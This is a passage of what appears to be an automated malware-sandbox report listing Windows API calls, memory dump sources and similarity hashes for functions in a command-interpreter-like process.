                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,?,?,0002BFD6,?,?,?,?,?,?,?,?), ref: 000364D4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000272EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00011028,?,?,?,0002F12E,0003CA50,00000018,00021E7C,00000000,00000000,0002ACE0,00000000,00000000,?,00000104,?), ref: 00027314
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,0002BFD6), ref: 0003646C
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,0002BFD6), ref: 00036474
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,0002BFD6), ref: 000364B6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 129137517-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,0003CD20,0000001C,000358DF), ref: 000362E6
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,0003CD20,0000001C,000358DF), ref: 00036301
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00036340
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0003635D
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: QueryValue$ErrorLastOpen
• String ID:
• API String ID: 4270309053-0
APIs
• memset.MSVCRT ref: 0003A034
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,0001234C,0020005D), ref: 0003A078
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0003A0AA
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,0020005D,0001234C,0020005D), ref: 0003A0C2
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: memset$DriveFullNamePathType
• String ID:
• API String ID: 3442494845-0
APIs
• wcstol.MSVCRT ref: 00022977
• wcstol.MSVCRT ref: 00022987
• lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0001E559,?,?,00000000,?), ref: 000229FF
• lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0001E559,?,?,00000000,?), ref: 00022A09
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: wcstol$lstrcmplstrcmpi
• String ID:
• API String ID: 4273384694-0
APIs
• memset.MSVCRT ref: 0003C56B
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 0003C5A5
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0003C5BD
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 0003C5DA
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: memset$DriveNamePathTypeVolume
• String ID:
• API String ID: 1029679093-0
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• _get_osfhandle.MSVCRT ref: 00039822
• WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000392EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0003982A
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00039841
• DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 0003986E
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: File$DeleteErrorLastWrite_get_osfhandle
• String ID:
• API String ID: 2448200120-0
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00039962,00000000,?,00000000,0002CF94,00000000,?), ref: 0001727F
• RtlFreeHeap.NTDLL(00000000), ref: 00017286
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 000172AF
• RtlFreeHeap.NTDLL(00000000), ref: 000172B6
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00016231,00000000,00000000,25170B64), ref: 0001630C
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00016313
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,0001BDB3,00000000,?), ref: 0001DD37
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0001DD3E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0001DD53
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0001DD5A
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2549470565-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00018A51), ref: 000384B9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00018A51), ref: 000384C6
                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00018A51), ref: 000384EA
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00018A51), ref: 000384F2
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1033415088-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00020060: wcschr.MSVCRT ref: 0002006C
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00025678
                                                                                                                                                                                                                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 0002568C
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000256A2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0003122B
Similarity
• API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
• String ID:
• API String ID: 22757656-0
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,000322F8), ref: 00032514
• RtlFreeHeap.NTDLL(00000000,?,?), ref: 0003251B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,000322F8), ref: 00032539
• RtlFreeHeap.NTDLL(00000000), ref: 00032540
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0001885E), ref: 00018B9D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001885E), ref: 00018BA4
  • Part of subcall function 0001A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0001A9C5), ref: 0001A9D8
  • Part of subcall function 0001A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0001A9F3
  • Part of subcall function 0001A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0001A9FA
  • Part of subcall function 0001A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0001AA09
  • Part of subcall function 0001A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0001AA12
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,0001885E), ref: 0002B5B5
• RtlFreeHeap.NTDLL(00000000,?,0001885E), ref: 0002B5BC
Similarity
• API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememcpy
• String ID:
• API String ID: 3480822025-0
APIs
  • Part of subcall function 00026F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00026F4F
• __set_app_type.MSVCRT ref: 00026872
• __p__fmode.MSVCRT ref: 00026888
• __p__commode.MSVCRT ref: 00026896
• __setusermatherr.MSVCRT ref: 000268B7
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1632413811-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c60dcc8cdc9da873be5af59f4a1cf36d7627e3749c73d6f7280db3dff7f60953
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9044a72da91ff2c8082d2523e2c72a5eba3d71f003670fb478cb08c36c469bb9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c60dcc8cdc9da873be5af59f4a1cf36d7627e3749c73d6f7280db3dff7f60953
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF09E756093908FEB556F30FD0A6493B65BB0A326B100B59F561862F2DF7E9540CA12
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00039F24
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,0003449C,?,?,00000001,?), ref: 00039F2C
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00039F42
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0003449C,?,?,00000001,?), ref: 00039F4A
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3b21c958cda7138cf7bfc41aa99324f7f70a59386a96db57d049412d5230f909
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b1d17696d270349c6296c102b5efc8ed0f6e9c806520a1fcbf1832ab694b92a6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b21c958cda7138cf7bfc41aa99324f7f70a59386a96db57d049412d5230f909
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4E04F71600305FFEB009BB0EC0EB9B776CEB45326F100615F525D60D1DAB9D900DA21
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001824E
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00018256
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00018264
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0001826C
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9db2dfb31e231dd959f6cfc34a616331f68945a8e86683da2c5aae6d655c90d9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 01d5c5c454ebe8dac0cfef4b0ac78128da7c6975567fc40eb7b6c4e540107fbc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9db2dfb31e231dd959f6cfc34a616331f68945a8e86683da2c5aae6d655c90d9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CE002F96146049FFB449BA0EE1DA563B64EB4A316F404609F205861A1DBBD6410DF16
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,0001729C), ref: 000172CF
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000172D6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 000172DF
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000172E6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
  • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
  • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
  • Part of subcall function 0001A62F: wcschr.MSVCRT ref: 0001A635
  • Part of subcall function 0001C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0001C5BD
  • Part of subcall function 0001C570: RtlFreeHeap.NTDLL(00000000), ref: 0001C5C4
  • Part of subcall function 0001C570: _setjmp3.MSVCRT ref: 0001C630
• _wcsupr.MSVCRT ref: 0002C21F
  • Part of subcall function 00021A47: memset.MSVCRT ref: 00021AE2
  • Part of subcall function 00021A47: ??_V@YAXPAX@Z.MSVCRT(00022229,?,00022229,00000000,-00000105,?,00000000,00000000), ref: 00021BA4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
Similarity
• API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
• String ID: FOR$ IF
• API String ID: 3818062306-2924197646
APIs
  • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
  • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
• wcschr.MSVCRT ref: 0003BF88
• memcpy.MSVCRT(00000000,?,00039E02,0003CD80,00000030,0003448F,?,?,?,00000001), ref: 0003C008
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
Similarity
• API ID: Heap$AllocProcessmemcpywcschr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 3241892172-381716982
APIs
• _wcsicmp.MSVCRT ref: 0001ABE3
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
  • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
  • Part of subcall function 0001CF10: _setjmp3.MSVCRT ref: 0001CF28
  • Part of subcall function 0001CF10: iswspace.MSVCRT ref: 0001CF6B
  • Part of subcall function 0001CF10: wcschr.MSVCRT ref: 0001CF8D
  • Part of subcall function 0001CF10: iswdigit.MSVCRT ref: 0001CFEE
  • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
  • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,00000000,00000000,00000002), ref: 0002CB58
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
